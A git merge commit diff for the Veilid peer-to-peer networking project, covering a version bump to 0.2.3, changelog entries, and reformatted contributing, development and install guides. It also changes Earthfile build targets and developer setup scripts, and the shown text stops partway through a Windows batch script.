Merge remote-tracking branch 'upstream/main'
Commit 6831eb37ad
@@ -1,5 +1,5 @@
 [bumpversion]
-current_version = 0.2.1
+current_version = 0.2.3

 [bumpversion:file:veilid-server/Cargo.toml]
 search = name = "veilid-server"
.capnp_version (new file)
@@ -0,0 +1 @@
+1.0.1
@@ -1,8 +1,4 @@
.vscode
.git
external/keyring-manager/android_test/.gradle
external/keyring-manager/android_test/app/build
external/keyring-manager/android_test/build
external/keyring-manager/android_test/local.properties
target
veilid-core/pkg
.protoc_version (new file)
@@ -0,0 +1 @@
+24.3
CHANGELOG.md (16 lines changed)
@@ -1,3 +1,19 @@
+**Changed in Veilid 0.2.3**
+- Security fix for WS denial of service
+- Support for latest Rust 1.72
+
+**Changed in Veilid 0.2.2**
+- Capnproto 1.0.1 + Protobuf 24.3
+- DHT set/get correctness fixes
+- Connection table fixes
+- Node resolution fixes
+- More debugging commands (appmessage, appcall, resolve, better nodeinfo, etc.)
+- Reverse connect for WASM nodes
+- Better TypeScript types for WASM
+- Various script and environment cleanups
+- Earthly build for aarch64 RPM
+- Much improved and faster public address detection
+
 **Changes in Veilid 0.2.1**
 - Crates are separated and publishable
 - First publication of veilid-core with docs to crates.io and docs.rs
@ -1,8 +1,9 @@
|
||||
# Contributing to Veilid
|
||||
|
||||
Before you get started, please review our [Code of Conduct](./code_of_conduct.md). We're here to make things better and we cannot do that without treating each other with respect.
|
||||
|
||||
|
||||
## Code Contributions
|
||||
|
||||
To begin crafting code to contribute to the Veilid project, first set up a [development environment](./DEVELOPMENT.md). [Fork] and clone the project into your workspace; check out a new local branch and name it in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
|
||||
Some contributions might introduce changes that are incompatible with other existing nodes. In this case it is recommended to also set a development network *Guide Coming Soon*.
|
||||
@ -11,63 +12,60 @@ Once you have added your new function or addressed a bug, test it locally to ens
|
||||
|
||||
We try to consider all merge requests fairly and with attention deserving to those willing to put in time and effort, but if you do not follow these rules, your contribution will be closed. We strive to ensure that the code joining the main branch is written to a high standard.
|
||||
|
||||
|
||||
### Code Contribution Do's & Don'ts:
|
||||
### Code Contribution Do's & Don'ts
|
||||
|
||||
Keeping the following in mind gives your contribution the best chance of landing!
|
||||
|
||||
#### <u>Merge Requests</u>
|
||||
|
||||
* **Do** start by [forking] the project.
|
||||
* **Do** create a [feature branch] to work on instead of working directly on `main`. This helps to:
|
||||
* Protect the process.
|
||||
* Ensures users are aware of commits on the branch being considered for merge.
|
||||
* Allows for a location for more commits to be offered without mingling with other contributor changes.
|
||||
* Allows contributors to make progress while an MR is still being reviewed.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Do** target your merge request to the **main branch**.
|
||||
* **Do** specify a descriptive title to make searching for your merge request easier.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** reference associated issues in your merge request description.
|
||||
* **Don't** leave your merge request description blank.
|
||||
* **Don't** abandon your merge request. Being responsive helps us land your code faster.
|
||||
* **Don't** submit unfinished code.
|
||||
|
||||
#### Merge Requests
|
||||
|
||||
- **Do** start by [forking] the project.
|
||||
- **Do** create a [feature branch] to work on instead of working directly on `main`. This helps to:
|
||||
- Protect the process.
|
||||
- Ensures users are aware of commits on the branch being considered for merge.
|
||||
- Allows for a location for more commits to be offered without mingling with other contributor changes.
|
||||
- Allows contributors to make progress while an MR is still being reviewed.
|
||||
- **Do** follow the [50/72 rule] for Git commit messages (see the example after this list).
|
||||
- **Do** target your merge request to the **main branch**.
|
||||
- **Do** specify a descriptive title to make searching for your merge request easier.
|
||||
- **Do** list [verification steps] so your code is testable.
|
||||
- **Do** reference associated issues in your merge request description.
|
||||
- **Don't** leave your merge request description blank.
|
||||
- **Don't** abandon your merge request. Being responsive helps us land your code faster.
|
||||
- **Don't** submit unfinished code.
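
As a point of reference for the 50/72 rule above, a hypothetical commit message (subject of 50 characters or fewer, body wrapped at 72 columns) might look like this:

    Protect relay connections from LRU eviction

    Mark connections to our current relay as protected when they are
    added to the connection table so they are not dropped when the
    per-protocol connection limit is reached.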
|
||||
|
||||
## Contributions Without Writing Code
|
||||
|
||||
There are numerous ways you can contribute to the growth and success of the Veilid project without writing code:
|
||||
|
||||
- If you want to submit merge requests, begin by [forking] the project and checking out a new local branch. Name your new branch in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
- Submit bugs as well as feature/enhancement requests. Letting us know you found a bug, have an idea for a new feature, or see a way we can enhance existing features is just as important and useful as writing the code related to those things. Send us detailed information about your issue or idea:
|
||||
- Features/Enhancements: Describe your idea. If you're able to, sketch out a diagram or mock-up.
|
||||
- Bugs: Please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Please be descriptive about the environment you've installed your node or application into.
|
||||
- [Help other users with open issues]. Sometimes all an issue needs is a little conversation to clear up a process or misunderstanding. Please keep the [Code of Conduct](./code_of_conduct.md) in mind.
|
||||
- Help other contributors test recently submitted merge requests. By pulling down a merge request and testing it, you can help validate new code contributions for stability and quality.
|
||||
- Report a security or privacy vulnerability. Please let us know if you find ways in which Veilid could handle security and/or privacy in a different or better way. Surely let us know if you find broken or otherwise flawed security and/or privacy functions. You can report these directly to security@veilid.org.
|
||||
- Add or edit documentation. Documentation is a living and evolving library of knowledge. As such, care, feeding, and even pruning is needed from time to time. If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
|
||||
- If you want to submit merge requests, begin by [forking] the project and checking out a new local branch. Name your new branch in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
- Submit bugs as well as feature/enhancement requests. Letting us know you found a bug, have an idea for a new feature, or see a way we can enhance existing features is just as important and useful as writing the code related to those things. Send us detailed information about your issue or idea:
|
||||
- Features/Enhancements: Describe your idea. If you're able to, sketch out a diagram or mock-up.
|
||||
- Bugs: Please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Please be descriptive about the environment you've installed your node or application into.
|
||||
- [Help other users with open issues]. Sometimes all an issue needs is a little conversation to clear up a process or misunderstanding. Please keep the [Code of Conduct](./code_of_conduct.md) in mind.
|
||||
- Help other contributors test recently submitted merge requests. By pulling down a merge request and testing it, you can help validate new code contributions for stability and quality.
|
||||
- Report a security or privacy vulnerability. Please let us know if you find ways in which Veilid could handle security and/or privacy in a different or better way. Surely let us know if you find broken or otherwise flawed security and/or privacy functions. You can report these directly to <security@veilid.org>.
|
||||
- Add or edit documentation. Documentation is a living and evolving library of knowledge. As such, care, feeding, and even pruning is needed from time to time. If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
#### <u>Bug Fixes</u>
|
||||
* **Do** include reproduction steps in the form of [verification steps].
|
||||
* **Do** link to any corresponding issues in your commit description.
|
||||
- **Do** include reproduction steps in the form of [verification steps].
|
||||
- **Do** link to any corresponding issues in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
When reporting Veilid issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports. Search open issues for similar bugs before filing a new report.
|
||||
* **Don't** attempt to report issues on a closed PR. New issues should be opened against the `main` branch.
|
||||
|
||||
Please report vulnerabilities in Veilid directly to security@veilid.org.
|
||||
- **Do** write a detailed description of your bug and use a descriptive title.
|
||||
- **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
- **Don't** file duplicate reports. Search open issues for similar bugs before filing a new report.
|
||||
- **Don't** attempt to report issues on a closed PR. New issues should be opened against the `main` branch.
|
||||
|
||||
Please report vulnerabilities in Veilid directly to <security@veilid.org>.
|
||||
|
||||
If you're looking for more guidance, talk to other Veilid contributors on the [Veilid Discord].
|
||||
|
||||
**Thank you** for taking a few moments to read this far! Together we will build something truly remarkable.
|
||||
|
||||
|
||||
|
||||
This contributor guide is inspired by the contribution guidelines of the [Metasploit Framework](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) project found on GitHub.
|
||||
|
||||
[Help other users with open issues]: https://gitlab.com/veilid/veilid/-/issues
|
||||
|
Cargo.lock (generated, 959 lines changed): file diff suppressed because it is too large.
Cargo.toml
@@ -8,6 +8,7 @@ members = [
    "veilid-wasm",
]
exclude = ["./external"]
resolver = "2"

[patch.crates-io]
cursive = { git = "https://gitlab.com/veilid/cursive.git" }
@ -1,8 +1,9 @@
|
||||
[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
|
||||
|
||||
# Veilid Development
|
||||
|
||||
[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
|
||||
|
||||
## Introduction
|
||||
|
||||
This guide covers setting up environments for core, Flutter/Dart, and Python development. See the relevant sections.
|
||||
|
||||
## Obtaining the source code
|
||||
@ -20,14 +21,15 @@ itself, Ubuntu or Mint. Pull requests to support other distributions would be
|
||||
welcome!
|
||||
|
||||
Running the setup script requires:
|
||||
|
||||
* Android SDK and NDK
|
||||
* Rust
|
||||
|
||||
You may decide to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. If so, use the dependency manager
|
||||
You may decide to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. If so, use the dependency manager
|
||||
within your IDE. If you plan on using Flutter for Veilid development, the Android Studio
|
||||
method is highly recommended as you may run into path problems with the 'flutter'
|
||||
command line without it. If you do so, you may skip to
|
||||
method is highly recommended as you may run into path problems with the 'flutter'
|
||||
command line without it. If you do so, you may skip to
|
||||
[Run Veilid setup script](#Run Veilid setup script).
|
||||
|
||||
* build-tools;33.0.1
|
||||
@ -38,7 +40,6 @@ command line without it. If you do so, you may skip to
|
||||
|
||||
#### Setup Dependencies using the CLI
|
||||
|
||||
|
||||
You can automatically install the prerequisites using this script:
|
||||
|
||||
```shell
|
||||
@ -88,20 +89,21 @@ cd veilid-flutter
|
||||
./setup_flutter.sh
|
||||
```
|
||||
|
||||
|
||||
### macOS
|
||||
|
||||
Development of Veilid on MacOS is possible on both Intel and ARM hardware.
|
||||
|
||||
Development requires:
|
||||
* Android Studio
|
||||
|
||||
* Android Studio
|
||||
* Xcode, preferably latest version
|
||||
* Homebrew [here](https://brew.sh)
|
||||
* Android SDK and NDK
|
||||
* Rust
|
||||
|
||||
You will need to use Android Studio [here](https://developer.android.com/studio)
|
||||
You will need to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. Use the SDK Manager in the IDE to install the following packages (use package details view to select version):
|
||||
|
||||
* Android SDK Build Tools (33.0.1)
|
||||
* NDK (Side-by-side) (25.1.8937393)
|
||||
* Cmake (3.22.1)
|
||||
@ -121,7 +123,7 @@ export PATH=\$PATH:$HOME/Library/Android/sdk/platform-tools
|
||||
EOF
|
||||
```
|
||||
|
||||
#### Run Veilid setup script
|
||||
#### Run Veilid setup script (macOS)
|
||||
|
||||
Now you may run the MacOS setup script to check your development environment and
|
||||
pull the remaining Rust dependencies:
|
||||
@ -130,7 +132,7 @@ pull the remaining Rust dependencies:
|
||||
./dev-setup/setup_macos.sh
|
||||
```
|
||||
|
||||
#### Run the veilid-flutter setup script (optional)
|
||||
#### Run the veilid-flutter setup script (optional) (macOS)
|
||||
|
||||
If you are developing Flutter applications or the flutter-veilid portion, you should
|
||||
install Android Studio, and run the flutter setup script:
|
||||
@ -144,13 +146,13 @@ cd veilid-flutter
|
||||
|
||||
For a simple installation allowing Rust development, follow these steps:
|
||||
|
||||
Install Git from https://git-scm.com/download/win
|
||||
Install Git from <https://git-scm.com/download/win>
|
||||
|
||||
Install Rust from https://static.rust-lang.org/rustup/dist/x86_64-pc-windows-msvc/rustup-init.exe
|
||||
Install Rust from <https://static.rust-lang.org/rustup/dist/x86_64-pc-windows-msvc/rustup-init.exe> (this may prompt you to run the Visual Studio Installer, and reboot, before proceeding).
|
||||
|
||||
Ensure that protoc.exe is in a directory in your path. For example, it can be obtained from https://github.com/protocolbuffers/protobuf/releases/download/v24.2/protoc-24.2-win64.zip
|
||||
Ensure that protoc.exe is in a directory in your path. For example, it can be obtained from <https://github.com/protocolbuffers/protobuf/releases/download/v24.3/protoc-24.3-win64.zip>
|
||||
|
||||
Ensure that capnp.exe is in a directory in your path. For example, it can be obtained from https://capnproto.org/capnproto-c++-win32-0.10.4.zip
|
||||
Ensure that capnp.exe (for Cap’n Proto 1.0.1) is in a directory in your path. For example, it can be obtained from the <https://capnproto.org/capnproto-c++-win32-1.0.1.zip> distribution. Please note that the Windows Package Manager Community Repository (i.e., winget) as of 2023-09-15 has version 0.10.4, which is not sufficient.
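
Once both tools are on your path, a quick optional sanity check is to confirm the versions they report; the veilid-core build script later in this change checks for exactly these output prefixes:

```shell
protoc --version   # expect output like: libprotoc 24.3
capnp --version    # expect output like: Cap'n Proto version 1.0.1
```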
|
||||
|
||||
Start a Command Prompt window.
|
||||
|
||||
|
36
Earthfile
36
Earthfile
@ -2,7 +2,7 @@ VERSION 0.6
|
||||
|
||||
# Start with older Ubuntu to ensure GLIBC symbol versioning support for older linux
|
||||
# Ensure we are using an amd64 platform because some of these targets use cross-platform tooling
|
||||
FROM ubuntu:16.04
|
||||
FROM ubuntu:18.04
|
||||
|
||||
# Install build prerequisites
|
||||
deps-base:
|
||||
@ -12,14 +12,16 @@ deps-base:
|
||||
# Install Cap'n Proto
|
||||
deps-capnp:
|
||||
FROM +deps-base
|
||||
COPY .capnp_version /
|
||||
COPY scripts/earthly/install_capnproto.sh /
|
||||
RUN /bin/bash /install_capnproto.sh 1; rm /install_capnproto.sh
|
||||
RUN /bin/bash /install_capnproto.sh 1; rm /install_capnproto.sh .capnp_version
|
||||
|
||||
# Install protoc
|
||||
deps-protoc:
|
||||
FROM +deps-capnp
|
||||
COPY .protoc_version /
|
||||
COPY scripts/earthly/install_protoc.sh /
|
||||
RUN /bin/bash /install_protoc.sh; rm /install_protoc.sh
|
||||
RUN /bin/bash /install_protoc.sh; rm /install_protoc.sh .protoc_version
|
||||
|
||||
# Install Rust
|
||||
deps-rust:
|
||||
@ -45,9 +47,6 @@ deps-rust:
|
||||
# Install Linux cross-platform tooling
|
||||
deps-cross:
|
||||
FROM +deps-rust
|
||||
# TODO: gcc-aarch64-linux-gnu is not in the packages for ubuntu 16.04
|
||||
# RUN apt-get install -y gcc-aarch64-linux-gnu curl unzip
|
||||
# RUN apt-get install -y gcc-4.8-arm64-cross
|
||||
RUN curl https://ziglang.org/builds/zig-linux-x86_64-0.11.0-dev.3978+711b4e93e.tar.xz | tar -C /usr/local -xJf -
|
||||
RUN mv /usr/local/zig-linux-x86_64-0.11.0-dev.3978+711b4e93e /usr/local/zig
|
||||
ENV PATH=$PATH:/usr/local/zig
|
||||
@ -74,14 +73,14 @@ deps-linux:
|
||||
# Code + Linux deps
|
||||
code-linux:
|
||||
FROM +deps-linux
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
COPY --dir .cargo .capnp_version .protoc_version files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
RUN cat /veilid/scripts/earthly/cargo-linux/config.toml >> /veilid/.cargo/config.toml
|
||||
WORKDIR /veilid
|
||||
|
||||
# Code + Linux + Android deps
|
||||
code-android:
|
||||
FROM +deps-android
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
COPY --dir .cargo .capnp_version .protoc_version files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
RUN cat /veilid/scripts/earthly/cargo-linux/config.toml >> /veilid/.cargo/config.toml
|
||||
RUN cat /veilid/scripts/earthly/cargo-android/config.toml >> /veilid/.cargo/config.toml
|
||||
WORKDIR /veilid
|
||||
@ -216,6 +215,27 @@ package-linux-arm64-deb:
|
||||
# save artifacts
|
||||
SAVE ARTIFACT --keep-ts /dpkg/out/*.deb AS LOCAL ./target/packages/
|
||||
|
||||
package-linux-arm64-rpm:
|
||||
FROM --platform arm64 rockylinux:8
|
||||
RUN yum install -y createrepo rpm-build rpm-sign yum-utils rpmdevtools
|
||||
RUN rpmdev-setuptree
|
||||
#################################
|
||||
### RPMBUILD .RPM FILES
|
||||
#################################
|
||||
RUN mkdir -p /veilid/target
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml package /veilid
|
||||
COPY +build-linux-arm64/aarch64-unknown-linux-gnu /veilid/target/aarch64-unknown-linux-gnu
|
||||
RUN mkdir -p /rpm-work-dir/veilid-server
|
||||
# veilid-server
|
||||
RUN veilid/package/rpm/veilid-server/earthly_make_veilid_server_rpm.sh aarch64 aarch64-unknown-linux-gnu
|
||||
#SAVE ARTIFACT --keep-ts /root/rpmbuild/RPMS/aarch64/*.rpm AS LOCAL ./target/packages/
|
||||
# veilid-cli
|
||||
RUN veilid/package/rpm/veilid-cli/earthly_make_veilid_cli_rpm.sh aarch64 aarch64-unknown-linux-gnu
|
||||
# save artifacts
|
||||
SAVE ARTIFACT --keep-ts /root/rpmbuild/RPMS/aarch64/*.rpm AS LOCAL ./target/packages/
|
||||
|
||||
|
||||
|
||||
package-linux-amd64:
|
||||
BUILD +package-linux-amd64-deb
|
||||
BUILD +package-linux-amd64-rpm
|
||||
|
82
INSTALL.md
82
INSTALL.md
@ -1,61 +1,99 @@
|
||||
# Install a Veilid Node
|
||||
|
||||
# Install and run a Veilid Node
|
||||
|
||||
## Server Grade Headless Nodes
|
||||
|
||||
|
||||
These network support nodes are heavier than the node a user would establish on their phone in the form of a chat or social media application. A cloud based virtual private server (VPS), such as Digital Ocean Droplets or AWS EC2, with high bandwidth, processing resources, and uptime availability is crucial for building the fast, secure, and private routing that Veilid is built to provide.
|
||||
|
||||
## Install
|
||||
|
||||
### Add the repo to a Debian based system and install a Veilid node
|
||||
This is a multi-step process.
|
||||
### Debian
|
||||
|
||||
Follow the steps here to add the repo to a Debian based system and install Veilid.
|
||||
|
||||
**Step 1**: Add the GPG keys to your operating system's keyring.<br />
|
||||
*Explanation*: The `wget` command downloads the public key, and the `sudo gpg` command adds the public key to the keyring.
|
||||
|
||||
```shell
|
||||
wget -O- https://packages.veilid.net/gpg/veilid-packages-key.public | sudo gpg --dearmor -o /usr/share/keyrings/veilid-packages-keyring.gpg
|
||||
```
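
If the key was imported correctly, the keyring file should now exist; you can optionally confirm with `ls -l /usr/share/keyrings/veilid-packages-keyring.gpg`.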
|
||||
|
||||
**Step 2**: Identify your architecture<br />
|
||||
*Explanation*: The following command will tell you what type of CPU your system is running
|
||||
|
||||
```shell
|
||||
dpkg --print-architecture
|
||||
```
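
On a typical 64-bit Intel or AMD machine this prints `amd64`; on 64-bit ARM hardware (for example, a Raspberry Pi 4 running a 64-bit OS) it prints `arm64`.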
|
||||
|
||||
**Step 3**: Add Veilid to your list of available software.<br />
|
||||
*Explanation*: Using the command in **Step 2** you will need to run **one** of the following:
|
||||
*Explanation*: Use the result of your command in **Step 2** and run **one** of the following:
|
||||
|
||||
- For **AMD64** based systems run this command:
|
||||
```shell
|
||||
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
```shell
|
||||
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
- For **ARM64** based systems run this command:
|
||||
```shell
|
||||
echo "deb [arch=arm64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
```shell
|
||||
echo "deb [arch=arm64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
*Explanation*:
|
||||
Each of the above commands will create a new file called `veilid.list` in the `/etc/apt/sources.list.d/` directory. This file contains instructions that tell the operating system where to download Veilid.
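
You can optionally confirm the entry was written correctly:

```shell
cat /etc/apt/sources.list.d/veilid.list
```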
|
||||
|
||||
**Step 4**: Refresh the package manager.<br />
|
||||
*Explanation*: This tells the `apt` package manager to rebuild the list of available software using the files in `/etc/apt/sources.list.d/` directory. This is invoked with "sudo" to grant superuser permission to make the changes.
|
||||
*Explanation*: This tells the `apt` package manager to rebuild the list of available software using the files in `/etc/apt/sources.list.d/` directory.
|
||||
|
||||
```shell
|
||||
sudo apt update
|
||||
```
|
||||
|
||||
**Step 5**: Install Veilid.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid! This is invoked with "sudo" to grant superuser permission to make the changes.
|
||||
**Step 5**: Install Veilid.
|
||||
|
||||
```shell
|
||||
sudo apt install veilid-server veilid-cli
|
||||
```
|
||||
|
||||
### Add the repo to a Fedora based system and install a Veilid node
|
||||
**Step 1**: Add Veilid to your list of available software.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid!
|
||||
### RPM-based
|
||||
|
||||
Follow the steps here to add the repo to
|
||||
RPM-based systems (CentOS, Rocky Linux, AlmaLinux, Fedora, etc.)
|
||||
and install Veilid.
|
||||
|
||||
**Step 1**: Add Veilid to your list of available software.
|
||||
|
||||
```shell
|
||||
yum-config-manager --add-repo https://packages.veilid.net/rpm/veilid-rpm-repo.repo
|
||||
sudo yum-config-manager --add-repo https://packages.veilid.net/rpm/veilid-rpm-repo.repo
|
||||
```
|
||||
**Step 2**: Install Veilid.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid!
|
||||
**Step 2**: Install Veilid.
|
||||
|
||||
```shell
|
||||
dnf install veilid-server veilid-cli
|
||||
sudo dnf install veilid-server veilid-cli
|
||||
```
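
You can optionally verify the installation afterwards with `rpm -q veilid-server veilid-cli`.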
|
||||
|
||||
## Start headless node
|
||||
|
||||
### With systemd
|
||||
|
||||
To start a headless Veilid node, run:
|
||||
|
||||
```shell
|
||||
sudo systemctl start veilid-server.service
|
||||
```
|
||||
|
||||
To have your headless Veilid node start at boot:
|
||||
|
||||
```shell
|
||||
sudo systemctl enable --now veilid-server.service
|
||||
```
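
To confirm the node came up, a quick optional check on a systemd-based system is:

```shell
sudo systemctl status veilid-server.service
```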
|
||||
|
||||
### Without systemd
|
||||
|
||||
`veilid-server` must be run as the `veilid` user.
|
||||
|
||||
To start your headless Veilid node without systemd, run:
|
||||
|
||||
```shell
|
||||
sudo -u veilid veilid-server
|
||||
```
|
||||
|
22
README-DE.md
22
README-DE.md
@ -1,8 +1,8 @@
|
||||
# Willkommen bei Veilid
|
||||
|
||||
- [Aus der Umlaufbahn](#aus-der-umlaufbahn)
|
||||
- [Betreibe einen Node](#betreibe-einen-node)
|
||||
- [Entwicklung](#entwicklung)
|
||||
- [Aus der Umlaufbahn](#aus-der-umlaufbahn)
|
||||
- [Betreibe einen Node](#betreibe-einen-node)
|
||||
- [Entwicklung](#entwicklung)
|
||||
|
||||
## Aus der Umlaufbahn
|
||||
|
||||
@ -13,17 +13,19 @@ Veilid wurde mit der Idee im Hinterkopf entworfen, dass jeder Benutzer seine eig
|
||||
Der primäre Zweck des Veilid Netzwerks ist es eine Infrastruktur für eine besondere Art von geteilten Daten zur Verfügung zu stellen: Soziale Medien in verschiedensten Arten. Dies umfasst sowohl leichtgewichtige Inhalte wie Twitters/Xs Tweets oder Mastodons Toots, mittleschwere Inhalte wie Bilder oder Musik aber auch schwergewichtige Inhalte wie Videos. Es ist eben so beabsichtigt Meta-Inhalte (wie persönliche Feeds, Antworten, private Nachrichten und so weiter) auf Basis von Veilid laufen zu lassen.
|
||||
|
||||
## Betreibe einen Node
|
||||
|
||||
Der einfachste Weg dem Veilid Netzwerk beim Wachsen zu helfen ist einen eigenen Node zu betreiben. Jeder Benutzer von Veilid ist automatisch ein Node, aber einige Nodes helfen dem Netzwerk mehr als Andere. Diese Nodes, die das Netzwerk unterstützen sind schwergewichtiger als Nodes, die Nutzer auf einem Smartphone in Form eine Chats oder eine Social Media Applikation starten würde.Droplets oder AWS EC2 mit hoher Bandbreite, Verarbeitungsressourcen und Verfügbarkeit sind wesentlich um das schnellere, sichere und private Routing zu bauen, das Veilid zur Verfügung stellen soll.
|
||||
|
||||
Um einen solchen Node zu betreiben, setze einen Debian- oder Fedora-basierten Server auf und installiere den veilid-server Service. Um dies besonders einfach zu machen, stellen wir Paketmanager Repositories als .deb und .rpm Pakete bereit. Für weitergehendene Information schaue in den [Installation](./INSTALL.md) Leitfaden.
|
||||
|
||||
## Entwicklung
|
||||
|
||||
Falls Du Lust hast, dich an der Entwicklung von Code oder auch auf andere Weise zu beteiligen, schau bitte in den [Mitmachen](./CONTRIBUTING.md) Leitfaden. Wir sind bestrebt dieses Projekt offen zu entwickeln und zwar von Menschen für Menschen. Spezifische Bereiche in denen wir nach Hilfe suchen sind:
|
||||
|
||||
* Rust
|
||||
* Flutter/Dart
|
||||
* Python
|
||||
* Gitlab DevOps und CI/CD
|
||||
* Dokumentation
|
||||
* Sicherheitsprüfungen
|
||||
* Linux Pakete
|
||||
- Rust
|
||||
- Flutter/Dart
|
||||
- Python
|
||||
- Gitlab DevOps und CI/CD
|
||||
- Dokumentation
|
||||
- Sicherheitsprüfungen
|
||||
- Linux Pakete
|
||||
|
22
README.md
22
README.md
@ -1,8 +1,8 @@
|
||||
# Welcome to Veilid
|
||||
|
||||
- [From Orbit](#from-orbit)
|
||||
- [Run a Node](#run-a-node)
|
||||
- [Development](#development)
|
||||
- [From Orbit](#from-orbit)
|
||||
- [Run a Node](#run-a-node)
|
||||
- [Development](#development)
|
||||
|
||||
## From Orbit
|
||||
|
||||
@ -13,17 +13,19 @@ Veilid is designed with a social dimension in mind, so that each user can have t
|
||||
The primary purpose of the Veilid network is to provide the infrastructure for a specific kind of shared data: social media in various forms. That includes light-weight content such as Twitter's tweets or Mastodon's toots, medium-weight content like images and songs, and heavy-weight content like videos. Meta-content such as personal feeds, replies, private messages, and so forth are also intended to run atop Veilid.
|
||||
|
||||
## Run a Node
|
||||
|
||||
The easiest way to help grow the Veilid network is to run your own node. Every user of Veilid is a node, but some nodes help the network more than others. These network support nodes are heavier than the node a user would establish on their phone in the form of a chat or social media application. A cloud based virtual private server (VPS), such as Digital Ocean Droplets or AWS EC2, with high bandwidth, processing resources, and up time availability is crucial for building the fast, secure, and private routing that Veilid is built to provide.
|
||||
|
||||
To run such a node, establish a Debian or Fedora based VPS and install the veilid-server service. To make this process simple we are hosting package manager repositories for .deb and .rpm packages. See the [installing](./INSTALL.md) guide for more information.
|
||||
|
||||
## Development
|
||||
|
||||
If you're inclined to get involved in code and non-code development, please check out the [contributing](./CONTRIBUTING.md) guide. We're striving for this project to be developed in the open and by people for people. Specific areas in which we are looking for help include:
|
||||
|
||||
* Rust
|
||||
* Flutter/Dart
|
||||
* Python
|
||||
* Gitlab DevOps and CI/CD
|
||||
* Documentation
|
||||
* Security reviews
|
||||
* Linux packaging
|
||||
- Rust
|
||||
- Flutter/Dart
|
||||
- Python
|
||||
- Gitlab DevOps and CI/CD
|
||||
- Documentation
|
||||
- Security reviews
|
||||
- Linux packaging
|
||||
|
@@ -9,7 +9,7 @@ fi
 if [ ! -z "$(command -v apt)" ]; then
     # Install APT dependencies
     sudo apt update -y
-    sudo apt install -y openjdk-11-jdk-headless iproute2 curl build-essential cmake libssl-dev openssl file git pkg-config libdbus-1-dev libdbus-glib-1-dev libgirepository1.0-dev libcairo2-dev checkinstall unzip llvm wabt
+    sudo apt install -y openjdk-11-jdk-headless iproute2 curl build-essential cmake libssl-dev openssl file git pkg-config libdbus-1-dev libdbus-glib-1-dev libgirepository1.0-dev libcairo2-dev checkinstall unzip llvm wabt python3-pip
 elif [ ! -z "$(command -v dnf)" ]; then
     # DNF (formerly yum)
     sudo dnf update -y
@@ -1,6 +1,11 @@
 #!/bin/bash
+set -eo pipefail

+if [ $(id -u) -eq 0 ]; then
+    echo "Don't run this as root"
+    exit
+fi

 SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"

 if [[ "$(uname)" != "Linux" ]]; then
@@ -109,7 +114,7 @@ fi
 rustup target add aarch64-linux-android armv7-linux-androideabi i686-linux-android x86_64-linux-android wasm32-unknown-unknown

 # install cargo packages
-cargo install wasm-bindgen-cli wasm-pack
+cargo install wasm-bindgen-cli wasm-pack cargo-edit

 # install pip packages
 pip3 install --upgrade bumpversion
@@ -139,7 +139,7 @@ esac
 rustup target add aarch64-apple-darwin aarch64-apple-ios aarch64-apple-ios-sim x86_64-apple-darwin x86_64-apple-ios wasm32-unknown-unknown aarch64-linux-android armv7-linux-androideabi i686-linux-android x86_64-linux-android

 # install cargo packages
-cargo install wasm-bindgen-cli wasm-pack
+cargo install wasm-bindgen-cli wasm-pack cargo-edit

 # install pip packages
 pip3 install --upgrade bumpversion
@@ -21,8 +21,8 @@ IF NOT DEFINED PROTOC_FOUND (

 FOR %%X IN (capnp.exe) DO (SET CAPNP_FOUND=%%~$PATH:X)
 IF NOT DEFINED CAPNP_FOUND (
